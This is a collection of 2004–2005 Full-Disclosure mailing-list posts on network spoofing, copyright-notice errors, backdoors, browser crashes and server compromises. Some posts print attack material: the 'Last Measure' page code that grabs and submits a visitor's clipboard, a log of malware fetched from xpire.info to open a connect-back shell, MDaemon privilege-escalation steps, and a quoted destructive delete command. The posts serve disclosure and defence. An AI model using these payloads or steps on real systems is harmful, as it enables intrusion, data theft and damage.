[Full-Disclosure] Re: Homograph attack fools (older versions of) Internet Explorer too
Use of Unicode codes in the href fools older versions of IE when it parses the hostname part. Obviously this has been fixed in a previous patch (my bad for not checking with a fully patched machine first! ) NOT vulnerable IE 6.0.2800.1106.xpsp2.040919-1003C0 vulnerable IE 6.0.2800.1106.xpsp2.030422-1633 I may get around to writing up the details but it is not urgent now that I know that fully patched IE is not vulnerable to this. Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ICMP Covert channels question
cyberpixl wrote: Well, what i meant was what if i use the networks router as a bounce host in order to get the packets into the network? If an icmp packet arrives at routers wan port with a source ip of an internal host will it send the echoreply to its lan port? Yes. Lacking proper anti-spoof ingress filtering, this will work. I currently haven't got the chance to test this, but i will as soon as i can. Then, in order to receive replyes from the host behind the firewall all I'd have to do is make it send packets to a bounce server outsede the network, like google.com with source set to my ip (assuming then that the router freely allows icmp traffic out of the network). Yes, lacking proper anti-spoof egress filtering, this will work. A correctly configured firewall should reject such packets on several grounds, even if ICMP is permitted by policy. On Wed, 02 Feb 2005 13:02:07 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Also, packet filtering is based on router configuration. More and more administrators are filtering packets with unexpected source and/or destination addresses ( ingress and egress filtering ). Proper ingress and egress filtering at all edge routers is critical for security. Rarely do I find a small site blocking outbound traffic based on the source IP. While non-routable *destination* addresses should not make it across the Internet, it is common for unroutable source addresses to be seen on inbound packets coming from the Internet. The number of sites doing proper filtering may be growing, but it's certainly still low enough that the attack still has a fairly high chance of working. With the a growing number of ISPs implementing Reverse Path Forwarding (aka Unicast RPF) on all customer connections, it should become more difficult to inject spoofed traffic through reputable providers. Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Scan for IRC
On Fri, 21 Jan 2005 17:34:00 -0600, RandallM [EMAIL PROTECTED] wrote: I am so sorry for interrupting the list. I'm trying to pick up IRC communications on the network. I've made some filters for Ethereal and Observer but can't seem to pick it up. I'm doing something wrong. Used the 6668-6669 ports. Any help? Not only can an IRC server be on any port (as mentioned by Oliver Leitner), but clients can also tunnel the connection through proxies, or even fully encrypt chat sessions inside SSL, within an SSH tunnel, or in a binary packet protocol such as SILC. Assuming the communication is in the clear, you could use Snort to detect IRC communication, regardless of port. More on this topic can be found here: http://www.giac.org/practical/GSEC/Chris_Hanna_GSEC.pdf Kevin (P.S. I don't know who Chris Hanna is, but the paper seems sound.) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MediaSentry false positives?
On Wed, 05 Jan 2005 09:53:55 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Tue, 04 Jan 2005 23:22:27 CST, Kevin said: I see two likely possibilities -- either MediaSentry is not using due diligence in verifying that the material for which they send infringement notices is actually shared from the address they show in the complaint, It turns out that this is the case. Just this morning we received a message from the copyright holder (Not MediaSentry, they've completely ignored our emails and phone calls through the whole process) stating Please disregard the notice you received. It was generated incorrectly, and the case ID or IDs mentioned are now closed. (A configuration problem with our anti-piracy vendor's system caused some notices to be sent in error.) or somebody on the Internet is spoofing BGP route announcements for unused address space out of larger allocations. This is actually quite likely a possibility. There are enough tier-1's who do a piss-poor job of filtering their BGP feeds that if you can inject an announcement you can hijack the address block. Thanks to BJ Premore from Renesys, we have been able to confirm that the addresses in question were _not_ hijacked during the time period where MediaSentry reported an infringing file share. The only recent hijack event covering any of our reported IP addresses didn't match up with any of the incident timestamps, was related to the December 24th Turk Telekom incident, one of many thousand prefixes announced through TTNet. We are investigating using Renesys services, myASn, and other BGP monitoring approaches to proactively detect future hijacks. Unfortunately, this doesn't address any underlying flaws in the mechanisms used by MediaSentry (and other similar services) to detect and report copyright infringement. Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER
original got bounced (mailbox full?) : snip : : : Windows Explorer is an advanced browsing tool made by Microsoft. It is used : : in daily tasks to open folders, copy files, delete files, rename files and : : view files on a system. It is the foundation of the World Wide Web and used : : OK, we need to figure out which Explorer this guy is talkin' about - Internet : Explorer or Windows Explorer. : : : Shogun Suzuki discovered that a remote user can connect to any machine via : : numerous exploits and use Windows Explorer to view files, rename files, : : delete files, change permissions on files stored on a remote machine that : : has been pwned. : : ..such as ... (HINT: What 'sploits?) : : : On a command prompt: del C:\WINDOWS\explorer.exe : : Erm...sure...OK. But what happens when the poor sucker reboots the box and : discovers the O/S is inop (provided the O/S even lets you delete the file in the : first place, since explorer.exe is the shell ...)? : : Sorry, but this was the very first post I saw after I joined this list a little : bit ago, and I couldn't resist a few comments. Is this guy for real, or is this a : joke? : : -K : : ___ : Full-Disclosure - We believe in it. : Charter: http://lists.netsys.com/full-disclosure-charter.html : : ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MediaSentry false positives?
On Wed, 05 Jan 2005 13:00:41 +0100, Florian Weimer [EMAIL PROTECTED] wrote: Kevin Kadow wrote: Has anybody received Notice of claimed infringement from MediaSentry for IP addresses which, while registered to you or your organization, are in a range not actively in use? I've independently received another report of this problem. I see two likely possibilities -- either MediaSentry is not using due diligence in verifying that the material for which they send infringement notices is actually shared from the address they show in the complaint, or somebody on the Internet is spoofing BGP route announcements for unused address space out of larger allocations. RIPE doesn't have an announcement of the prefix, so I think MediaSentry was in error. I don't think it makes sense for MediaSentry to check their findings more closely from a business perspective. They don't try to download the infringing material to confirm that redistribution actually takes place, either. Sounds like an opportunity to take down MediaSentry. The takedown notices state the following: ] On behalf of copyright holder, owner of the exclusive rights to the ] copyrighted material at issue in this notice, we hereby state, that ] we have a good faith belief that use of the material in the manner ] complained of is not authorized by copyright holder, its respective ] agents, or the law. ] ] Also, we hereby state, under penalty of perjury, under the laws of ] the State of California and under the laws of the United States, that the ] information in this notification is accurate and that we are authorized ] to act on behalf of the owner of the exclusive rights being infringed ] as set forth in this notification. Given the references to good faith and perjury in the above text, if the data collection methods employed by MediaSentry are demonstrably faulty, falsely implicate source IP addresses not actually participating in file sharing (not a spoofed BGP route, rather a bogus entry in the Kazaa or eDonkey indexes showing the wrong source IP), MediaSentry may no longer be protected by the good faith clause? Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER
snip : Windows Explorer is an advanced browsing tool made by Microsoft. It is used : in daily tasks to open folders, copy files, delete files, rename files and : view files on a system. It is the foundation of the World Wide Web and used OK, we need to figure out which Explorer this guy is talkin' about - Internet Explorer or Windows Explorer. : Shogun Suzuki discovered that a remote user can connect to any machine via : numerous exploits and use Windows Explorer to view files, rename files, : delete files, change permissions on files stored on a remote machine that : has been pwned. ..such as ... (HINT: What 'sploits?) : On a command prompt: del C:\WINDOWS\explorer.exe Erm...sure...OK. But what happens when the poor sucker reboots the box and discovers the O/S is inop (provided the O/S even lets you delete the file in the first place, since explorer.exe is the shell ...)? Sorry, but this was the very first post I saw after I joined this list a little bit ago, and I couldn't resist a few comments. Is this guy for real, or is this a joke? -K ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Backdoors and source code (was Re: [Full-Disclosure] Multiple Backdoors found...)
On Sun, 02 Jan 2005 20:27:09 -0800, Blue Boar [EMAIL PROTECTED] wrote: Dave Aitel wrote: Of course, this sort of thing is basically impossible to disprove - especially without source. If I were looking for a well-hidden backdoor, I wouldn't bother with source. There's no guarantee that a particular binary was produced by a particular group of source unless you can compile it yourself to the same set of bytes. And even when you have two binary files built by the same compiler version on two different machines running the same OS version, it's not uncommon for the two files to not produce the same set of bytes. See the recent thread on 'httpd cleanup' from the OpenBSD 'tech' list. Even then, you've got no guarantee the backdoor isn't introduced as part of the build process or a compiler quirk, rather than being in the source. On the subject of visible source as a protection against backdoors, I notice that PGP.Com offers source code to their products for download for exactly this purpose, but does *not* provide any instructions on how to validate that the binaries produced from the visible source PGP desktop for Windows match up with the binary executables and libraries distributed when you install a licensed PGP desktop build. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MediaSentry false positives?
Has anybody received Notice of claimed infringement from MediaSentry for IP addresses which, while registered to you or your organization, are in a range not actively in use? I recently received two notices from MediaSentry for MPAA material, each listing a single file shared via Kazaa, for two very different IP addresses for which I am a contact. In both cases, the IP addresses reported were in fact within the range allocated, however the address shown is not only not in use, no address with the same first three octets is either used or announced via BGP, nor have they ever been publicly visible. I see two likely possibilities -- either MediaSentry is not using due diligence in verifying that the material for which they send infringement notices is actually shared from the address they show in the complaint, or somebody on the Internet is spoofing BGP route announcements for unused address space out of larger allocations. Before I panic and start researching solutions to address the latter problem, I'm hoping to first verify whether in fact the MediaSentry notices have any basis in fact? Thanks, Kevin Kadow (P.S. If you have received a similar Notice of claimed infringement letter from MediaSentry for unused IP addresses, please feel free to contact me privately.) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] List of worm and trojan files
Carilda A Thomas [EMAIL PROTECTED] wrote: I have been looking but I cannot find a list all in one place of the various illegitimate files that various worms and trojans install into Microsoft systems. What'd really help here is a list of MD5 checks for known bad binaries. Obviously a custom build of sdbot or just a simple hexedit would defeat this, but such a list would still have value against automated attacks, etc. Perhaps I should clarify about this list thing: A friend of mine is apparently running a rogue email server and a rogue ftp server, and none of the virus checkers we have tried will determine what program or where. I looked for a windows equivalent to lsof but there doesn't appear to be one - Sysinternals has applications that, taken in combination, do much of what 'lsof' does under Unix. Specifically, tcpview (http://www.sysinternals.com/ntw2k/source/tcpview.shtml) will show you any listening sockets, the associated process, and the location from which the process launched. This should suffice to locate a rogue FTP service on a Windows PC. the one I found can only determine the program if it sees a packet go by and cannot find a quiescent program. The A/V checkers do not flag an email server, considering it a legitimate program. Task manager is also destroyed, so there is no help there. I was hoping to find a list of illegitimate files for which I could check. Assuming the attacker is competent, the only way to clean a deeply compromised machine is to reformat the drive and start from scratch. The truly paranoid will question whether just formatting the drive is sufficient. Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] TCP Port 42 port scans? What the heck over...
Theres a patch out today... Microsoft Security Bulletin MS04-045: Vulnerability in WINS Could Allow Remote Code Execution (870763) Bulletin URL: http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx Version Number: 1.0 Issued Date: Tuesday, December 14, 2004 Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Important Patch(es) Replaced: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list. Caveats: None -KF Florian Weimer wrote: * James Lay: Here they be. ODD. Anyone else seeing this? Probably yes. 8-) 42/TCP is used by Microsoft's WINS replication, and this service has got a security hole for which Microsoft has yet to release a patch. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [Advisory] Mozilla Products Remote Crash Vulnerability
(gdb) c Continuing. [New Thread 147461 (LWP 10836)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 10810)] 0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so (gdb) bt #0 0x4a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so #1 0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so #2 0x412cb905 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so #3 0x412d28a5 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so #4 0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so #5 0x40069215 in js_Interpret () from /usr/lib/libmozjs.so #6 0x400604ac in js_Execute () from /usr/lib/libmozjs.so #7 0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/libmozjs.so #8 0x411068c8 in nsJSContext::EvaluateString () from /usr/lib/mozilla/components/libgklayout.so #9 0x40fa0020 in nsScriptLoader::EvaluateScript () from /usr/lib/mozilla/components/libgklayout.so #10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from /usr/lib/mozilla/components/libgklayout.so #11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from /usr/lib/mozilla/components/libgklayout.so #12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from /usr/lib/mozilla/components/libgklayout.so #13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from /usr/lib/mozilla/components/libgklayout.so #14 0x40f5ac89 in nsGenericElement::AppendChildTo () from /usr/lib/mozilla/components/libgklayout.so #15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from /usr/lib/mozilla/components/libgklayout.so #16 0x410431d0 in HTMLContentSink::Init () from /usr/lib/mozilla/components/libgklayout.so #17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #18 0x08a756e8 in ?? () #19 0x08d9bd30 in ?? () #20 0xb1a8 in ?? () #21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #22 0x08c8e9b8 in ?? () #23 0x in ?? () #24 0xb1a8 in ?? () #25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #26 0x08c8e9b8 in ?? () #27 0x08d9bd30 in ?? () #28 0xb1d8 in ?? () #29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #30 0x0054 in ?? () #31 0x in ?? () ---Type return to continue, or q return to quit--- #32 0xb1d8 in ?? () #33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #34 0x08c8e9b8 in ?? () #35 0x08d9bd30 in ?? () #36 0xb1d8 in ?? () #37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #38 0x08162600 in ?? () #39 0x in ?? () #40 0x08c8e9b8 in ?? () #41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #42 0x0001 in ?? () #43 0x0001 in ?? () #44 0xb228 in ?? () #45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #46 0x08c8e9b8 in ?? () #47 0x08d9bd30 in ?? () #48 0x0054 in ?? () #49 0x0001 in ?? () #50 0x in ?? () #51 0x08d9bd30 in ?? () #52 0x08c8e9b8 in ?? () #53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #54 0xb218 in ?? () #55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #56 0x0001 in ?? () #57 0x0001 in ?? () #58 0x0001 in ?? () #59 0x08c8e9b8 in ?? () #60 0x0001 in ?? () #61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #62 0x in ?? () #63 0x in ?? () ---Type return to continue, or q return to quit--- #64 0xb268 in ?? () #65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #66 0x08c8e9b8 in ?? () #67 0x08972690 in ?? () #68 0x0054 in ?? () #69 0x08d9bd30 in ?? () #70 0x08972800 in ?? () #71 0x in ?? () #72 0x000f in ?? () #73 0x0054 in ?? () #74 0x08d9bd30 in ?? () #75 0x08c8e9b8 in ?? () #76 0x0001 in ?? () #77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #78 0x in ?? () #79 0x08972690 in ?? () #80 0xb348 in ?? () #81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #82 0x08c8e9b8 in ?? () #83 0x08972690 in ?? () #84 0x0028 in ?? () #85 0x0805d486 in nsSubstring::Assign () Previous frame inner to this frame (corrupt stack?) -KF Niek van der Maas wrote: Hi, I'm posting it here, the Mozilla guys didn't want to answer or even confirm this bug. No idea whether this one is exploitable or not, I'll leave that over to the readers of these lists. Bye, Niek van der Maas MaasOnline http://maas-online.nl/ Mozilla Products Remote Crash Vulnerability === Vendor: The Mozilla Organisation Product(s): Navigator, Firefox, other Gecko based products Version(s): All released versions Platform(s) : All platforms (confirmed on Windows, Linux and SunOS) Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/) Advisory URL :
Re: [Full-Disclosure] Lycos Europe organizing a DDoS attack against spammers
On Tue, 30 Nov 2004 13:38:31 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote: Lycos Europe organizing a DDoS attack against spammers Lycos Europe has started organizing a distributed denial-of-service attack against web sites run by spammers. Lycos, via its makelovenotspam.com website, is offering a free screensaver for download. The screensavers make constant http requests to spam websites. Can anybody provide pointers on how to detect this traffic by reviewing squid proxy logs? I'd guess that at least a few of our (thousands of) users will install makelovenotspam, but lacking the authority to lock down or examine desktops, I'm limited to reviewing access logs after the fact to track down offenders. Thanks, Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Old LS Trojan?
You should think a CISSP could write such a script in like 5 minutes. David S. Morgan wrote: Hey all, I am looking for an old LS trojan, with trojan being a misnomer. Essentially, the scinario is that the admin (root) has a . (dot) in his path. The bad-user knows this, and has crafted an LS shell script (the part that I can't find) that essentially copies /sbin/sh to a hidden directory and then performs some suid majik to make the sh run as if they were root, without needing the root password. The file then removes itself and does the real version of ls. Does anyone remember this one, and have the ls script anywhere? I would like to use it in a demonstration. I know that this has probobly been fixed in various ways, but I have old Unixes for just such occasions. Dave Morgan David S. Morgan CISSP, CCNP aka: [EMAIL PROTECTED] When the winds of change blow hard enough, even the most tiny object can become a deadly projectile ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] this is fun?
Um yeah... fun.
404 error then to this form which auto submits:
htmlheadtitleGNAA Last Measure version 3.4/title/headbody
form name=clip method=post action=index.php
style=display:none
input type=text name=content
input type=hidden name=send value=1
input type=hidden name=refer value=
input type=hidden name=user value=
input type=submit
/form
script language=javascript
// without this if statement check, it bombs out with an error
if (typeof clipboardData != 'undefined') {
var content = clipboardData.getData(Text);
document.forms[clip].elements[content].value = content;
}
document.forms[clip].submit();
/script
/body/html
Then this code:
html
head
meta name=generator content=
HTML Tidy for Linux/x86 (vers 1st March 2004), see www.w3.org
titleOur lawyer has informed us that we need a warning. So, if
you are under the age of 18 or find this offensive, please leave
immediately/title
script language=JavaScript type=text/javascript
window.name = 'lastmeasure';
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115)
alert(Our lawyer has informed us that we need a war
+ning. So, if you are under the age of 18 or find this offensive, please
leave immediately); }
function ctrlkey() { if (event.keyCode == 17) alert(Our lawyer has
informed us that we need a warning. So, if you are unde
+r the age of 18 or find this offensive, please leave immediately); }
function delkey() { if (event.keyCode == 46) alert(LAST MEASURE BY
PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubg
+irl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's
Wife\nWhat the fuck? That guy's ass is showing in
+his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker
bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROP
+S TO GNAA. LOL HY --DiKKy (GNAA NORWAY CORRESPONDANT)); }
var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
var goat = 0;
/*
let's figure out what the fuck kind of browser the poor plebs are using :(
MSIE gets a special kind of last measure where I start off with a
ModelessDialog and pop up from it. Gets around google toolbar. --
goat-see */
var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);
var is_ie = (agt.indexOf(msie) != -1);
var is_ie4up = (is_ie (is_major = 4));
var is_nav= (nom.indexOf('netscape')!=-1);
var is_nav4 = (is_nav (is_major == 4));
var is_mac= (agt.indexOf(mac)!=-1);
var is_gecko = (agt.indexOf('gecko') != -1);
// GECKO REVISION
var is_rev=0
if (is_gecko) {
temp = agt.split(rv:)
is_rev = parseFloat(temp[1])
}
function procreate(){
if(window.opener) {return 0;} // fuck procreating like rabbits -- goat-see
// sleep(1);
popUp(christmas.php);
popUp(lemonparty.php);
popUp(penisbird.php);
popUp(pillowfight.php);
popUp(tubgirl.php);
popUp(spin.php);
popUp(freak.php);
popUp(rustina.php);
popUp(loopback.php);
popUp(eww.php);
popUp(weightlifter.php);
}
function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}
function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}
function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
}
function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}
function fOff(){
flagrun = 0;
}
function popUp(URL) {
day = new Date();
id = day.getTime();
eval(page + id + = window.open(URL, '_blank',
'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,widt
+h=640,height=583'););
}
function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos screen.width-175){
newXlt();
}
if (xPos 0){
newXrt();
}
if (yPos screen.height-100){
newYup();
}
if (yPos 0){
newYdn();
}
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
/script
/head
body background=hello.jpg bgcolor=#FF onmousemove=
playBall(); onLoad=playBall();
leftmargin=0 topmargin=0 marginwidth=0 marginheight=0
forminput type=submit value=CLICK ME name=CLICK ME
style=width: 2000px; height: 2000px; background-image: url('po+oped.jpg'
);
src=hello.jpg height=300 width=300 onmouseover=if(is_ie)
{showModelessDialog('procreator.php'); return true; }docume
+nt.goatse
.reset();playBall();return true;
onclick=if(is_ie) {showModelessDialog('procreator.php'); return true; }
playBall();return true;
onmouseout=if(is_ie) {showModelessDialog('procreator.php'); return
true; } else{procreate();} playBall();return true;
img src=pooped.jpg onmouseover=
if(is_ie) {showModelessDialog('procreator.php'); return true; }
procreate();playBall();return true;
onmouseout=if(is_ie)
Re: [Full-Disclosure] Is www.sco.com hacked?
Would not surprise me... They STILL use their own vulnerable version of WU ftp server. Even after being told multiple times year after year to patch their stuff up. I think I will run out of fingers to count the number of individuals @SCO or @Caldera that I have told about this... http://lists.netsys.com/pipermail/full-disclosure/2003-August/008577.html -KF Peter Prochaska wrote: Rossen Naydenov [EMAIL PROTECTED] wrote: I just noticed the banner on www.sco.com If you don't saw it( because it is removed) this is what they say: We own all your code pay us all your money Or is it some commercial trick? Yes it's hacked. Read the text that the woman wrote on the chalkboard :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Privilege escalation flaw in MDaemon 7.2.
I discovered and reported this to the vendor over a year ago... the vendor did not respond to me either. Now thats service with a smile. =] -KF Reed Arvin wrote: Summary: A privilege escalation flaw exists in MDaemon 7.2 (http://www.mdaemon.com). Details: A privilege escalation technique can be used to gain SYSTEM level access while interacting with the MDaemon tray icon. Vulnerable Versions: MDaemon 7.2 Solutions: The vendor was notified of the issue. There was no response. Exploit: 1. Double click on the mail icon in the Taskbar to open the Alt-N MDaemon Pro window. 2. Click File, click New 3. Notepad should open. In Notepad click File, click Open 4. In the Files of type: field choose All Files 5. Navagate to %WINDIR%\System32\ 6. Right click cmd.exe and choose Open 7. A new command shell will open with SYSTEM privileges Discovered by Reed Arvin reedarvin[at]gmail[dot]com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP
On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John [EMAIL PROTECTED] wrote: Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off. (Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys). Agreed. Current SSL standards rely on public key encryption methods which obtain their strength from the difficulty of the factoring problem. Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else. Yes -- however, there are workarounds. If you control one end point or the other, then you can take steps to permit examination of the contents of SSL sessions. Server: If you control the server, you can of course load the keys into the sniffer (risky, but not unheard of, see http://www.radware.com/content/products/ct100/default.asp)) or terminate the SSL session on a device under your control. (For an RPC-over-HTTP example, see this document: http://www.msexchange.org/pages/article_p.asp?id=613) Client: If you control the client (say a corporate desktop PC), you have another option -- you can modify the clients list of trusted CAs, and force the client to establish the SSL session to your proxy server. This gives the proxy an opportunity to inspect/log/modify the cleartext contents of the session. The proxy establishes it's own SSL session to the remote server normally neither the client or server would be aware of the MITM. A freeware implementation of this MITM approach was Achilles, I have also seen at least one commercial product offering this functionality to permit content-scanning of outbound HTTPS browser traffic. Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] xpire.info splitinfinity.info - exploits in the wild
On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio [EMAIL PROTECTED] wrote: Hi list, i'm doing some analysis on a Linux-Mandrake 9.0 web server of a person that was compromised in October. In this host now it's installed a special trojan that insert a malicious IFRAME tag into every served .PHP page. . . . I've found inside Apache log that the hacker break-in inside the machine using an overflow and injecting an executable /tmp/a.out via qmail-inject. I'm not sure that qmail-inject isn't a red herring? The actual download looks like 'wget' was used. These are the suspicious log lines : [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11) [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11) [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11) [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11) qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO [EMAIL PROTECTED] [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11) [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11) [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11) qmail-inject: fatal: unable to parse this line: To: Drugo:[EMAIL PROTECTED] sh: -c: option requires an argument --15:50:07-- http://xpire.info/cli.gz = `/tmp/a.out' Resolving xpire.info... fatto. Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta inviata, aspetto la risposta... 200 OK Lunghezza: 19,147 [text/plain] 0K .. 100% 9.97K 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147] [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11) [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11) Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for Linux, possible containing a ConnectBack shell. Inside this ELF file you can grep these strings: Usage: %s host port pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't fork pty, bye! Fuck you so /bin/sh No connect Looking up %s... Failed! OK %u Connect Back I don't know if the hacker installs in this machine a rootkit, but the check of md5sum of ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr. was good... I assume you used a bootable CD on the infected machine to do the checksums? The main problem is finding how the Apache Server (or PHP) was altered by the hacker, because every user that connects to this host now, could be infected by several HTML/IE recent exploits. Check the httpd.conf (and other apache configuration files) for any changes, and also the contents of each module loaded. It's also possilble, but less likely, that the injection is done in a kernel module. Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a random way??) web server inserts a special javascript between HTTP-Header and served page. Sounds like a good time to replace the entire server with a fresh build. Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts
On Mon, 18 Oct 2004 10:28:39 -0400, Clairmont, Jan M [EMAIL PROTECTED] wrote: Oh yeah and we can trust you bozos not to put in backdoors, sploits and other great modes of entry yeah right. 8-, Hire the burgler to secure your home, yeah right? Doh! Just because J.Random Hacker starts out as an immature 17 year old script kiddie breaking into random systems doesn't mean (assume he avoids prison) he can't grow up to become a mature security professional who knows how to follow a policy procedure, comply with audit, and work a 9-to-5 job. Scratch a thirty-something lead InfoSec consultant from any major consulting firm (including the big four), and chances are you'll find a 31337 Hax0r from the 90's. And this is excluding the obvious L0pht-@Stake-Symantec progression. People mature over time, grow into a more professional attitude without losing the inventiveness and insight that makes them effective. Sheessh what a stupid idea? The whole point of hiring people who don't know much is that they follow a policy procedure and comply with audit, I have yet to see a Hck3r follow any procedure. So how do you control anything such as policy etc, the wild west again? You hire professional security people to maintain control, not chaos, and find methodologies procedures and products that are the most effective, test, re-test, remediate, deploy and defend. And that can be maintained and operated by ordinary computer folk, who want to do an honest days work and collect their rightful pay, but maybe you never thought of that! Sure, bean counters have their place too. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts
